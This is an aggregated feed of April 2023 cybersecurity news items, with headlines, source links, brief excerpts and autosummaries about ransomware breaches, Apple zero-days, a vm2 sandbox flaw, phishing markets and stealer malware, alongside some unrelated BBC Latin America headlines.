                Autosummary: According to the company's general conditions agreement, this data may include tax information, government ID numbers, addresses, full names, birth dates, phone numbers, bank account numbers, employee evaluations, and more.


                Estonian National Charged in U.S. for Acquiring Electronics and Metasploit Pro for Russian Military

                industry rusia-ucrania
                2023-04-10 https://thehackernews.com/2023/04/estonian-national-charged-in-us-for.html
                An Estonian national has been charged in the U.S. for purchasing U.S.-made electronics on behalf of the Russian government and military. The 45-year-old individual, Andrey Shevlyakov, was arrested on March 28, 2023, in Tallinn. He has been indicted with 18 counts of conspiracy and other charges. If found guilty, he faces up to 20 years in prison. Court documents allege that Shevlyakov operated


                Apple fixes recently disclosed zero-days on older iPhones and iPads

                exploits
                2023-04-10 https://www.bleepingcomputer.com/news/apple/apple-fixes-recently-disclosed-zero-days-on-older-iphones-and-ipads/
                Apple has released emergency updates to backport security patches released on Friday, addressing two actively exploited zero-day flaws also affecting older iPhones, iPads, and Macs. [...]


                KFC, Pizza Hut owner discloses data breach after ransomware attack

                financial exploits ransomware
                2023-04-10 https://www.bleepingcomputer.com/news/security/kfc-pizza-hut-owner-discloses-data-breach-after-ransomware-attack/
                Yum! Brands, the brand owner of the KFC, Pizza Hut, and Taco Bell fast food chains, is now sending data breach notification letters to an undisclosed number of individuals whose personal information was stolen in a January 13 ransomware attack. [...]

                Autosummary: "On January 18, 2023, we announced a ransomware attack that impacted certain IT Systems which resulted in the closure of fewer than 300 restaurants in one market for one day, temporarily disrupted certain of our affected systems and resulted in data being taken from our network," the company said in its 2022 annual report filed with the U.S. Securities and Exchange Commission (SEC) on Friday.


                CISA adds zero-day bugs in iPhones, Macs, and iPads to its Known Exploited Vulnerabilities catalog

                exploits
                2023-04-10 https://securityaffairs.com/144638/security/apple-flaws-cisa-known-exploited-vulnerabilities-catalog.html

                US Cybersecurity and Infrastructure Security Agency (CISA) added two flaws in iPhones, Macs, and iPads to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: This week Apple has released emergency security updates to address the above actively exploited zero-day […]

                The post CISA adds zero-day bugs in iPhones, Macs, and iPads to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

                Autosummary: U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: CVE-2023-28205 – Apple Multiple Products WebKit Use-After-Free Vulnerability; CVE-2023-28206 – Apple iOS, iPadOS, and macOS IOSurfaceAccelerator Out-of-Bounds Write Vulnerability; This week Apple has released emergency security updates to address the above actively exploited zero-day vulnerabilities impacting iPhones, Macs, and iPads.


                SD Worx shuts down UK and Ireland services after cyberattack

                ciber
                2023-04-10 https://securityaffairs.com/144629/hacking/sd-worx-suffered-cyberattack.html

                Belgian HR giant SD Worx was forced to shut down its IT infrastructure for its UK and Ireland services after a cyber attack. HR and payroll management firm SD Worx shut down its IT systems for its UK and Ireland services after a cyber attack. The company employs more than 7,000 HR professionals and serves over […]

                The post SD Worx shuts down UK and Ireland services after cyberattack appeared first on Security Affairs.



                WATCH: Entire building collapses onto road in Mexico

                latam
                2023-04-10 https://www.bbc.co.uk/news/world-latin-america-65234499?at_medium=RSS&at_campaign=KARANGA
                Authorities in Tijuana say the building is the second to collapse in the area following a landslide.


                Estonian National charged with helping Russia acquire U.S. hacking tools and electronics

                industry
                2023-04-09 https://securityaffairs.com/144567/cyber-crime/estonian-national-helped-russia-acquire-us-electronics.html

                Andrey Shevlyakov, an Estonian national, was charged in the US with conspiracy and other charges related to acquiring U.S.-made electronics on behalf of the Russian government and military. The Estonian man is accused of having helped the Russian government and military to purchase US-made electronics and hacking tools. The defendant was arrested in Estonia on […]

                The post Estonian National charged with helping Russia acquire U.S. hacking tools and electronics appeared first on Security Affairs.




                Researchers disclose critical sandbox escape bug in vm2 sandbox library

                exploits
                2023-04-09 https://securityaffairs.com/144582/hacking/vm2-rce-sandbox-escape.html

                The development team behind the vm2 JavaScript sandbox library addressed a critical Remote Code Execution vulnerability. The developers behind the vm2 JavaScript sandbox module have addressed a critical vulnerability, tracked as CVE-2023-29017 (CVSS score 9.8), that could be exploited to execute arbitrary shellcode. vm2 is a sandbox that can run untrusted code in an isolated context […]

                The post Researchers disclose critical sandbox escape bug in vm2 sandbox library appeared first on Security Affairs.




                Twitter: BBC objects to "government funded media" label

                government
                2023-04-09 https://www.bbc.co.uk/news/entertainment-arts-65226481?at_medium=RSS&at_campaign=KARANGA
                Corporation says it wants to resolve issue after one of its main accounts receives new designation.



                Iran-Based Hackers Caught Carrying Out Destructive Attacks Under Ransomware Guise

                exploits ransomware
                2023-04-08 https://thehackernews.com/2023/04/iran-based-hackers-caught-carrying-out.html
                The Iranian nation-state group known as MuddyWater has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation. That's according to new findings from the Microsoft Threat Intelligence team, which discovered the threat actor targeting both on-premises and cloud infrastructures in partnership with another emerging activity cluster dubbed

                Autosummary: It's also tracked by the cybersecurity community under various names, including Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mercury, Seedworm, Static Kitten, TEMP.Zagros, and Yellow Nix.


                Apple Releases Updates to Address Zero-Day Flaws in iOS, iPadOS, macOS, and Safari

                exploits
                2023-04-08 https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html
                Apple on Friday released security updates for iOS, iPadOS, macOS, and Safari web browser to address a pair of zero-day flaws that are being exploited in the wild. The two vulnerabilities are as follows - CVE-2023-28205 - A use after free issue in WebKit that could lead to arbitrary code execution when processing specially crafted web content. CVE-2023-28206 - An out-of-bounds write issue in



                The young men of Mexico risking their lives to be Catholic priests

                latam
                2023-04-08 https://www.bbc.co.uk/news/world-latin-america-65174632?at_medium=RSS&at_campaign=KARANGA
                Dozens of priests have been killed in recent years in an area of Mexico plagued with cartel violence.



                Taiwanese PC Company MSI Falls Victim to Ransomware Attack

                exploits ransomware
                2023-04-08 https://thehackernews.com/2023/04/taiwanese-pc-company-msi-falls-victim.html
                Taiwanese PC company MSI (short for Micro-Star International) officially confirmed it was the victim of a cyber attack on its systems. The company said it "promptly" initiated incident response and recovery measures after detecting "network anomalies." It also said it alerted law enforcement agencies of the matter. That said, MSI did not disclose any specifics about when the attack took place

                Autosummary: "Currently, the affected systems have gradually resumed normal operations, with no significant impact on financial business," the company said in a brief notice shared on Friday.


                CISA adds Veritas Backup Exec flaws to its Known Exploited Vulnerabilities catalog

                exploits
                2023-04-08 https://securityaffairs.com/144561/security/veritas-backup-exec-known-exploited-vulnerabilities-catalog.html

                US CISA has added Veritas Backup Exec flaws, which were exploited in ransomware attacks, to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: This week Mandiant researchers reported that an affiliate of the ALPHV/BlackCat ransomware gang, tracked as UNC4466, was observed […]

                The post CISA adds Veritas Backup Exec flaws to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.




                Outcome-based cybersecurity paves way for organizational goals

                ciber
                2023-04-07 https://www.helpnetsecurity.com/2023/04/07/outcome-based-cybersecurity-approach/

                Organizations follow a reactive approach to cybersecurity which is stifling their progress in demonstrating value and aligning with business outcomes, according to WithSecure. 83% of respondents surveyed in the study were interested in, planning to adopt, or expanding their adoption of outcome-based security solutions and services. Reactive cybersecurity approach prevails in most organizations However, the study also found that most organizations currently approach cybersecurity on a reactive basis. 60% of survey respondents said they react … More

                The post Outcome-based cybersecurity paves way for organizational goals appeared first on Help Net Security.


                Autosummary: The most common outcomes that respondents wanted security to support included risk management, with 44% of survey respondents wanting to reduce risk to meet their top cybersecurity goals; customer experience, with 40% of respondents wanting security to improve customer experience; and revenue growth, which was highlighted by 34% of respondents.


                April 2023 Patch Tuesday forecast: The vulnerability discovery race

                exploits
                2023-04-07 https://www.helpnetsecurity.com/2023/04/07/april-2023-patch-tuesday-forecast/

                The answer to the question “Why does software continue to have so many vulnerabilities?” is complex, because the software itself is so complex. There’ve been many articles written that cover the lack of tools to test for vulnerabilities, the security knowledge and experience of the developers themselves, the endless variations of interactions between operating systems and applications, and the complexity of the network environments into which the software is deployed to name but a few … More

                The post April 2023 Patch Tuesday forecast: The vulnerability discovery race appeared first on Help Net Security.


                Autosummary: There've been many articles written that cover the lack of tools to test for vulnerabilities, the security knowledge and experience of the developers themselves, the endless variations of interactions between operating systems and applications, and the complexity of the network environments into which the software is deployed to name but a few contributing factors. Prizes were also awarded for exploitation of Apple macOS, Adobe Reader, Microsoft SharePoint, VMware Workstation, and even a Tesla in the automotive category.


                Microsoft Takes Legal Action to Disrupt Cybercriminals' Illegal Use of Cobalt Strike Tool

                ciber
                2023-04-07 https://thehackernews.com/2023/04/microsoft-takes-legal-action-to-disrupt.html
                Microsoft said it teamed up with Fortra and Health Information Sharing and Analysis Center (Health-ISAC) to tackle the abuse of Cobalt Strike by cybercriminals to distribute malware, including ransomware. To that end, the tech giant's Digital Crimes Unit (DCU) revealed that it secured a court order in the U.S. to "remove illegal, legacy copies of Cobalt Strike so they can no longer be used by



                CISA Warns of Critical ICS Flaws in Hitachi, mySCADA, ICL, and Nexx Products

                industry
                2023-04-07 https://thehackernews.com/2023/04/cisa-warns-of-critical-ics-flaws-in.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published eight Industrial Control Systems (ICS) advisories warning of critical flaws affecting products from Hitachi Energy, mySCADA Technologies, Industrial Control Links, and Nexx. Topping the list is CVE-2022-3682 (CVSS score: 9.9), impacting Hitachi Energy's MicroSCADA System Data Manager SDM600 that could allow an

                Autosummary: The following versions of Nexx smart home devices are affected - Nexx Garage Door Controller (NXG-100B, NXG-200) - Version nxg200v-p3-4-1 and prior; Nexx Smart Plug (NXPG-100W) - Version nxpg100cv4-0-0 and prior; Nexx Smart Alarm (NXAL-100) - Version nxal100v-p1-9-1 and prior. "Successful exploitation of these vulnerabilities could allow an attacker to receive sensitive information, execute application programmable interface (API) requests, or hijack devices," CISA said.


                Phishing emails from legit YouTube address hitting inboxes

                financial
                2023-04-07 https://www.helpnetsecurity.com/2023/04/07/youtube-phishing-email/

                Phishers are targeting YouTube content creators by leveraging the service’s Share Video by Email feature, which delivers the phishing email from an official YouTube email address (no-reply@youtube.com). How the YouTube phishing email scam works? The email informs the targets of a new monetization policy, new rules, and prompts them to view a video. The email also contains and points to a document hosted on Google Drive and provides the password for opening it. Finally, the … More

                The post Phishing emails from legit YouTube address hitting inboxes appeared first on Help Net Security.


                Autosummary: TeamYouTube (@TeamYouTube) April 4, 2023 Social media content creator Kevin Breeze has warned YouTube about this particular scam and noted that this is not a simple case of spoofed email, but rather a more sophisticated attack where scammers are taking advantage of the platform's sharing system.


                Microsoft aims at stopping cybercriminals from using cracked copies of Cobalt Strike

                ciber
                2023-04-07 https://securityaffairs.com/144537/hacking/microsoft-vs-cracked-copies-cobalt-strike.html

                Microsoft announced it has taken legal action to disrupt the illegal use of copies of the post-exploitation tool Cobalt Strike by cybercriminals. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named ‘Beacon’ on the victim machine. The Beacon includes a wealth of functionality for the attacker, including, but […]

                The post Microsoft aims at stopping cybercriminals from using cracked copies of Cobalt Strike appeared first on Security Affairs.




                FBI warns of companies exploiting sextortion victims for profit

                exploits
                2023-04-07 https://www.bleepingcomputer.com/news/security/fbi-warns-of-companies-exploiting-sextortion-victims-for-profit/
                For-profit companies reportedly linked to sextortion activity are targeting victims using various deceptive tactics to pressure them into paying for "assistance" services provided by non-profit agencies and law enforcement for free, the FBI warns. [...]

                Autosummary: In a public service announcement published on Friday, the FBI said that such companies use a wide range of methods, from threats and manipulation to feeding the victims false information, to persuade sextortion victims into paying exorbitant fees for their help.


                Researchers Uncover Thriving Phishing Kit Market on Telegram Channels

                financial
                2023-04-07 https://thehackernews.com/2023/04/researchers-uncover-thriving-phishing.html
                In yet another sign that Telegram is increasingly becoming a thriving hub for cybercrime, researchers have found that threat actors are using the messaging platform to peddle phishing kits and help set up phishing campaigns. "To promote their "goods," phishers create Telegram channels through which they educate their audience about phishing and entertain subscribers with polls like, "What type

                Autosummary: "Scammer-operated Telegram channels sometimes post what appears to be exceptionally generous offers, for example, zipped up sets of ready-to-use phishing kits that target a large number of global and local brands," Svistunova said.


                Apple fixes two zero-days exploited to hack iPhones and Macs

                exploits
                2023-04-07 https://www.bleepingcomputer.com/news/apple/apple-fixes-two-zero-days-exploited-to-hack-iphones-and-macs/
                Apple has released emergency security updates to address two new zero-day vulnerabilities exploited in attacks to compromise iPhones, Macs, and iPads. [...]



                Exploit available for critical bug in VM2 JavaScript sandbox library

                exploits
                2023-04-07 https://www.bleepingcomputer.com/news/security/exploit-available-for-critical-bug-in-vm2-javascript-sandbox-library/
                Proof-of-concept exploit code has been released for a recently disclosed critical vulnerability in the popular VM2 library, a JavaScript sandbox that is used by multiple software to run code securely in a virtualized environment. [...]

                Autosummary: VM2 has more than 16 million monthly downloads via the NPM package repository and it is used by integrated development environments (IDEs) and code editors, function-as-a-service (FaaS) solutions, pen-testing frameworks, security tools, and various JavaScript-related products.


                MSI confirms security breach following ransomware attack claims

                exploits ransomware
                2023-04-07 https://www.bleepingcomputer.com/news/security/msi-confirms-security-breach-following-ransomware-attack-claims/
                Following reports of a ransomware attack, Taiwanese PC vendor MSI (short for Micro-Star International) confirmed today that its network was breached in a cyberattack. [...]



                MSI confirms security breach after Money Message ransomware attack

                financial exploits ransomware
                2023-04-07 https://securityaffairs.com/144546/data-breach/msi-confirms-security-breach.html

                Multinational IT corporation MSI (Micro-Star International) confirms security breach after Money Message ransomware gang claimed the hack. This week the ransomware gang Money Message announced to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Micro-Star International AKA MSI designs, manufactures, and sells motherboards and graphics cards for customers in the United States, Canada, and […]

                The post MSI confirms security breach after Money Message ransomware attack appeared first on Security Affairs.




                CISA orders agencies to patch Backup Exec bugs used by ransomware gang

                exploits ransomware
                2023-04-07 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-backup-exec-bugs-used-by-ransomware-gang/
                On Friday, U.S. Cybersecurity and Infrastructure Security Agency (CISA) increased by five its list of security issues that threat actors have used in attacks, three of them in Veritas Backup Exec exploited to deploy ransomware. [...]

                Autosummary: Initial access in ransomware attack. Of the five vulnerabilities that CISA added to the catalog of Known Exploited Vulnerabilities (KEV) today, only one was rated critical, an issue in Veritas' data protection software tracked as CVE-2021-27877 that allows remote access and command execution with elevated privileges.


                Apple addressed two actively exploited zero-day flaws

                exploits
                2023-04-07 https://securityaffairs.com/144551/hacking/apple-zero-day-flaws-3.html

                Apple released emergency security updates to address two actively exploited zero-day vulnerabilities impacting iPhones, Macs, and iPads. Apple has released emergency security updates to address two actively exploited zero-day vulnerabilities, tracked as CVE-2023-28205 and CVE-2023-28206, impacting iPhones, Macs, and iPads. Impacted devices include: Both vulnerabilities were reported by Clément Lecigne of Google’s Threat Analysis Group […]

                The post Apple addressed two actively exploited zero-day flaws appeared first on Security Affairs.




                The staggering cost of identity fraud for financial services

                financial
                2023-04-06 https://www.helpnetsecurity.com/2023/04/06/identity-fraud-financial-services-industry/

                The impact of identity fraud varies for organizations in the financial services industry, based on whether they belong to the banking or FinTech sector, according to Regula. Specifically, every fourth bank reported experiencing over 100 identity fraud incidents in the past year (26% of organizations), while this number is lower (17%) for the FinTech sector. Economic damage When asked to evaluate the cost of the identity fraud they had experienced, the banking sector was found … More

                The post The staggering cost of identity fraud for financial services appeared first on Help Net Security.


                Autosummary: Specifically, for the banking sector, the second-largest cost resulting from identity fraud is penalties and fines (36%), while for FinTech organizations, it is the loss of current and potential clients (40%).


                The hidden picture of malware attack trends

                exploits
                2023-04-06 https://www.helpnetsecurity.com/2023/04/06/malware-attack-trends-q4-2022/

                Despite the decline in network-detected malware in Q4 2022, endpoint ransomware spiked by 627%, while malware associated with phishing campaigns persisted as a threat, according to WatchGuard. Malware going undetected Despite seeing an overall decline in malware, further analysis from WatchGuard Threat Lab researchers looking at Fireboxes that decrypt HTTPS (TLS/SSL) traffic found a higher incidence of malware, indicating malware activity has shifted to encrypted traffic. Since just ~20% of Fireboxes that provide data for … More

                The post The hidden picture of malware attack trends appeared first on Help Net Security.


                Autosummary: Malware going undetected. Despite seeing an overall decline in malware, further analysis from WatchGuard Threat Lab researchers looking at Fireboxes that decrypt HTTPS (TLS/SSL) traffic found a higher incidence of malware, indicating malware activity has shifted to encrypted traffic. "A continuing and concerning trend in our data and research shows that encryption – or, more accurately, the lack of decryption at the network perimeter – is hiding the full picture of malware attack trends," said Corey Nachreiner, CSO at WatchGuard.


                Industrial Defender launches Phoenix to secure SMBs operations

                industry
                2023-04-06 https://www.helpnetsecurity.com/2023/04/06/industrial-defender-phoenix/

                Industrial Defender has unveiled the launch of Phoenix, an OT security solution tailored to the needs of SMBs. Phoenix is revolutionizing how smaller industrial organizations approach OT security by providing visibility into all their OT assets and their associated cyber risks. By providing a solution that is easy to deploy and cost-effective, Phoenix enables SMBs to overcome resource barriers and secure their operations effectively. “From ransomware campaigns to nation-state attacks, cyber threats against industrial organizations … More

                The post Industrial Defender launches Phoenix to secure SMBs operations appeared first on Help Net Security.


                Autosummary: Suited for environments with up to 200 endpoints, Phoenix provides a quick, automated view of all OT assets and vital endpoint information including: device type, make, model and serial number; software and firmware; user accounts; ports and services; configuration details. Phoenix provides a quick on-ramp to asset discovery by monitoring network communication.


                Resecurity uncovers STYX, new cybercriminal platform focused on financial fraud

                financial ciber
                2023-04-06 https://www.helpnetsecurity.com/2023/04/06/resecurity-uncovers-styx-cybercriminal-platform/

                Resecurity has recently identified the STYX Innovation Marketplace, a new cybercriminal e-commerce platform with a specialized focus on financial fraud and money laundering. STYX launched at the beginning of 2023. This platform is specifically designed to facilitate financial crime, providing cybercriminals with a range of services, including stolen financial data, credit card information, forged documents, money laundering services, victim reconnaissance 'lookups', and more. This discovery illustrates the post-pandemic menace of cyber-enabled financial crime and … More

                The post Resecurity uncovers STYX, new cybercriminal platform focused on financial fraud appeared first on Help Net Security.


                Autosummary: This platform is specifically designed to facilitate financial crime, providing cybercriminals with a range of services, including stolen financial data, credit card information, forged documents, money laundering services, victim reconnaissance 'lookups', and more. Beyond institutional cybersecurity, FIs must also evolve their anti-money-laundering (AML), KYC, fraud prevention, and cyber units beyond yesterday's divisional silos.


                IT and security pros pressured to keep quiet about data breaches

                financial
                2023-04-06 https://www.helpnetsecurity.com/2023/04/06/pressure-keeping-breaches-confidential/

                Organizations globally are under tremendous pressure to address evolving threats like ransomware, zero-day vulnerabilities, and espionage, and they face challenges in extending security coverage across multiple environments and dealing with an ongoing skills shortage, according to Bitdefender. “The results of this survey demonstrate, more than ever, the importance of layered security that delivers advanced threat prevention, detection and response across the entire business while improving efficiencies that allow security teams to do more with less,” … More

                The post IT and security pros pressured to keep quiet about data breaches appeared first on Help Net Security.


                Autosummary: At 71%, IT/security professionals in the US were the most likely to say they have been told to keep quiet, followed by the UK at 44%, Italy at 36.7%, Germany at 35.3%, Spain at 34.8% and France at 26.8%.


                Money Message ransomware gang claims MSI breach, demands $4 million

                financial exploits ransomware
                2023-04-06 https://www.bleepingcomputer.com/news/security/money-message-ransomware-gang-claims-msi-breach-demands-4-million/
                Taiwanese PC parts maker MSI (Micro-Star International) has been listed on the extortion portal of a new ransomware gang known as "Money Message," which claims to have stolen source code from the company's network. [...]



                Telegram now the go-to place for selling phishing tools and services

                financial
                2023-04-06 https://www.bleepingcomputer.com/news/security/telegram-now-the-go-to-place-for-selling-phishing-tools-and-services/
                Telegram has become the working ground for the creators of phishing bots and kits looking to market their products to a larger audience or to recruit unpaid helpers. [...]

                Autosummary: User data offered for sale (Kaspersky). Phishing-as-a-service (PhaaS) subscriptions that provide access to tools, beginner guides, technical support, and regular updates for the provided anti-detection systems.


                OCR Labs exposes its systems, jeopardizing major banking clients

                financial
                2023-04-06 https://securityaffairs.com/144514/data-breach/ocr-labs-data-leak.html

                A digital identification tool provided by OCR Labs to major banks and government agencies leaked sensitive credentials, putting clients at severe risk. The Cybernews research team discovered a misconfiguration in the OCR Labs system that exposed sensitive data. The company is a leading provider of digital ID verification tools, with its IDkit tool being used […]

                The post OCR Labs exposes its systems, jeopardizing major banking clients appeared first on Security Affairs.


                Autosummary: The file contained database credentials, including host, port, and username, Amazon Web Services (AWS) with Simple Queue Service (SQS) access credentials, application tokens, and various application programming interface (API) keys. The discovered data leak impacted financial institutions in Australia – QBANK, mainly used by government agency workers, Defence Bank, catering to the Australian armed forces, and MA Money, a company that focuses on residential mortgages.


                Mexico police seize dozens of exotic animals during raid

                latam
                2023-04-06 https://www.bbc.co.uk/news/world-latin-america-65195926?at_medium=RSS&at_campaign=KARANGA
                Police find 25 exotic animals at a property near Mexico City thought to belong to petrol smugglers.



                Medusa ransomware claims attack on Open University of Cyprus

                exploits ransomware
                2023-04-06 https://www.bleepingcomputer.com/news/security/medusa-ransomware-claims-attack-on-open-university-of-cyprus/
                The Medusa ransomware gang has claimed a cyberattack on the Open University of Cyprus (OUC), which caused severe disruptions of the organization's operations. [...]

                Autosummary: "As a precaution, access is not provided to the University's eLearning Platform, Employment Portal, the Portal for applications of prospective students, and other critical systems that mainly concern the University community," reads the OUC announcement.


                Rorschach ransomware deployed by misusing a security tool

                exploits ransomware
                2023-04-06 https://www.helpnetsecurity.com/2023/04/06/rorschach-ransomware-misusing-security-tool/

                An unbranded ransomware strain that recently hit a US-based company is being deployed by attackers who are misusing a tool included in a commercial security product, Check Point researchers have found. The solution in question is Palo Alto Networks’ Cortex XDR, whose Dump Service Tool the attackers appropriated and are now misusing to side-load the DLL that decrypts and injects the (newly labeled) Rorschach ransomware. Rorschach’s execution flow (Source: Check Point) The peculiarities of Rorschach … More

                The post Rorschach ransomware deployed by misusing a security tool appeared first on Help Net Security.


                Autosummary: It can spread itself automatically when executed on a Domain Controller (DC), where it creates a group policy that puts copies of itself on all workstations, then one that kills specific processes, and finally one that registers a scheduled task that will run the main executable. It clears Windows event logs on affected machines, disables the Windows firewall, and deletes shadow volumes and backups (to make data recovery more difficult). It has a hard-coded configuration but has additional capabilities that can be deployed via different command line arguments (e.g., the operator can choose not to change the wallpaper of the infected machine or deliver a ransom note, or make it so that a password is needed to run the sample).


                Money Message ransomware group claims to have hacked IT giant MSI

                financial exploits ransomware
                2023-04-06 https://securityaffairs.com/144519/cyber-crime/money-message-claims-msi-hack.html

                Ransomware gang Money Message claims to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Ransomware gang Money Message announced to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Micro-Star International AKA MSI designs, manufactures, and sells motherboards and graphics cards for customers in the United States, Canada, and internationally. MSI is headquartered in Taipei, […]

                The post Money Message ransomware group claims to have hacked IT giant MSI appeared first on Security Affairs.




                Ukrainian hackers spend $25,000 of pro-Russian blogger’s money on sex toys

                financial rusia-ucrania
                2023-04-06 https://www.bitdefender.com/blog/hotforsecurity/ukrainian-hackers-spend-25-000-of-pro-russian-bloggers-money-on-sex-toys/
                A pro-Russian blogger who raised $25,000 for drones to assist Russian troops fighting in Ukraine has received a huge delivery of sex toys instead. Read more in my article on the Hot for Security blog.



                A fireside chat with four CISOs about how they secure their cybersecurity firms from attack

                ciber
                2023-04-06 https://grahamcluley.com/a-fireside-chat-with-four-cisos-about-how-they-secure-their-cybersecurity-firms-from-attack/
                On Tuesday 11 April, I'll be joined by the CISOs of security firms Wiz, Rubrik, Noname, and Abnormal, for a friendly chat about how they protect their organisations from the huge number of threats targeting them. I hope to see some of you there!



                Steer clear of tax scams – Week in security with Tony Anscombe

                financial
                2023-04-06 https://www.welivesecurity.com/videos/steer-clear-tax-scams-week-security-tony-anscombe/

                In a rush to file your taxes? Watch out for cybercriminals preying on stressed taxpayers as Tax Day looms large on the horizon.

                The post Steer clear of tax scams – Week in security with Tony Anscombe appeared first on WeLiveSecurity



                Visitors of tax return e-file service may have downloaded malware

                exploits
                2023-04-06 https://www.malwarebytes.com/blog/news/2023/04/visitors-of-tax-return-e-file-service-may-have-downloaded-malware

                Categories: News, Scams

                Tags: tax scams, efile.com, US tax 2023, backdoor, Trojan, Johannes Ullrich, MalwareHunterTeam, /u/SaltyPotter, fake network error notification

                Cybercriminals have compromised eFile.com to host malicious code that allows for the download of Trojans.

                The post Visitors of tax return e-file service may have downloaded malware appeared first on Malwarebytes Labs.

                Autosummary: Known figures in cybersecurity, such as MalwareHunterTeam (@malwarehunterteam) and Johannes Ullrich (@johullrich) of SANS, caught wind of the potential site compromise and dug in, with each writing their analysis. The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers and corroborated by BleepingComputer.


                IoT garage door exploit allows for remote opening attack

                exploits industry
                2023-04-06 https://www.malwarebytes.com/blog/news/2023/04/iot-garage-door-exploit-allows-for-remote-opening-attack

                Categories: News

                Tags: IoT, garage, door, remote, open, app, switch, alarm, Nexx

                Multiple exploits are impacting a line of smart products for the home.

                The post IoT garage door exploit allows for remote opening attack appeared first on Malwarebytes Labs.

                Autosummary: If you have devices and apps being used to power your home, alarms, doors, windows, or anything else, now is the time to check if those passwords are hard coded. From the CISA mitigations page, which doesn’t go quite as far as Sabetan’s advice to remove all of the Nexx products from your home or place of business: Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet.


                A whirlwind adventure: Malwarebytes' 15-year journey in business cybersecurity

                exploits ciber
                2023-04-06 https://www.malwarebytes.com/blog/business/2023/04/a-whirlwind-adventure-malwarebytes-15-year-journey-in-business-cybersecurity

                Categories: Business

                It's time to buckle up and embark on a whimsical journey through the twists and turns of Malwarebytes' evolution.

                The post A whirlwind adventure: Malwarebytes' 15-year journey in business cybersecurity appeared first on Malwarebytes Labs.

                Autosummary: Act III: The Plot Thickens (June 2014 - 2016). In 2014, Malwarebytes launched the Anti-Malware Remediation Tool, a sleek, portable solution for businesses to eliminate malware with minimal fuss. In 2018, we expanded our portfolio with Endpoint Protection for Mac, Endpoint Detection and Response (EDR) for Windows endpoints, EDR Ransomware Rollback, and EDR Endpoint Isolation. Act VIII: The Mobile Frontier (2023 and beyond). As we set our sights on the future, 2023 marked our foray into Mobile Protection for iOS, Android, and Chromebook platforms.


                How AI is transforming cybersecurity for better and worse

                ciber
                2023-04-05 https://www.helpnetsecurity.com/2023/04/05/ai-transforming-cybersecurity-video/

                Many sectors view AI and machine learning with mixed emotions, but for the cybersecurity industry, they present a double-edged sword. On the one hand, AI provides powerful tools for cybersecurity professionals, such as automated security processing and threat detection. On the other hand, cybercriminals have access to the same technology, making it a constant cat-and-mouse game between attackers and defenders. In this Help Net Security video, Matt Aldridge, Principal Solutions Consultant at OpenText Cyber Security, …

                The post How AI is transforming cybersecurity for better and worse appeared first on Help Net Security.



                Protect Your Company: Ransomware Prevention Made Easy

                exploits ransomware
                2023-04-05 https://thehackernews.com/2023/04/protect-your-company-ransomware.html
                Every year hundreds of millions of malware attacks occur worldwide, and every year businesses deal with the impact of viruses, worms, keyloggers, and ransomware. Malware is a pernicious threat and the biggest driver for businesses to look for cybersecurity solutions. Naturally, businesses want to find products that will stop malware in its tracks, and so they search for solutions to do that.

                Autosummary: It's important to look for malware solutions that can confront today's key threats, such as known malware, polymorphic variants, ransomware, zero-day exploits, and Advanced Persistent Threats (APTs). This approach will not only help stop and mitigate the damage from malware, but defend against other types of threats too, such as credential theft as a result of phishing, insider threats, and supply-chain attacks.


                Typhon Reborn Stealer Malware Resurfaces with Advanced Evasion Techniques

                exploits
                2023-04-05 https://thehackernews.com/2023/04/typhon-reborn-stealer-malware.html
                The threat actor behind the information-stealing malware known as Typhon Reborn has resurfaced with an updated version (V2) that packs in improved capabilities to evade detection and resist analysis. The new version is offered for sale on the criminal underground for $59 per month, $360 per year, or alternatively, for $540 for a lifetime subscription. "The stealer can harvest and exfiltrate

                Autosummary: Typhon was first documented by Cyble in August 2022, detailing its myriad features, including hijacking clipboard content, capturing screenshots, logging keystrokes, and stealing data from crypto wallet, messaging, FTP, VPN, browser, and gaming apps.


                STYX Marketplace emerged in Dark Web focused on Financial Fraud

                financial
                2023-04-05 https://securityaffairs.com/144446/cyber-crime/styx-marketplace-dark-web.html

                Resecurity has recently identified the STYX Marketplace, a new cybercriminal e-commerce platform with a specialized focus on financial fraud and money laundering. The STYX marketplace was launched at the beginning of 2023. This platform is specifically designed to facilitate financial crime, providing cybercriminals with a range of services, including stolen financial data, credit card information, […]

                The post STYX Marketplace emerged in Dark Web focused on Financial Fraud appeared first on Security Affairs.

                Autosummary: This platform is specifically designed to facilitate financial crime, providing cybercriminals with a range of services, including stolen financial data, credit card information, forged documents, money laundering services, victim reconnaissance ‘lookups’, and more.


                CryptoClippy: New Clipper Malware Targeting Portuguese Cryptocurrency Users

                exploits
                2023-04-05 https://thehackernews.com/2023/04/cryptoclippy-new-clipper-malware.html
                Portuguese users are being targeted by a new malware codenamed CryptoClippy that's capable of stealing cryptocurrency as part of a malvertising campaign. The activity leverages SEO poisoning techniques to entice users searching for "WhatsApp web" to rogue domains hosting the malware, Palo Alto Networks Unit 42 said in a new report published today. CryptoClippy, a C-based executable, is a type



                Hackers Using Self-Extracting Archives Exploit for Stealthy Backdoor Attacks

                exploits
                2023-04-05 https://thehackernews.com/2023/04/hackers-using-self-extracting-archives.html
                An unknown threat actor used a malicious self-extracting archive (SFX) file in an attempt to establish persistent backdoor access to a victim's environment, new findings from CrowdStrike show. SFX files are capable of extracting the data contained within them without the need for dedicated software to display the file contents. They achieve this by including a decompressor stub, a piece of code

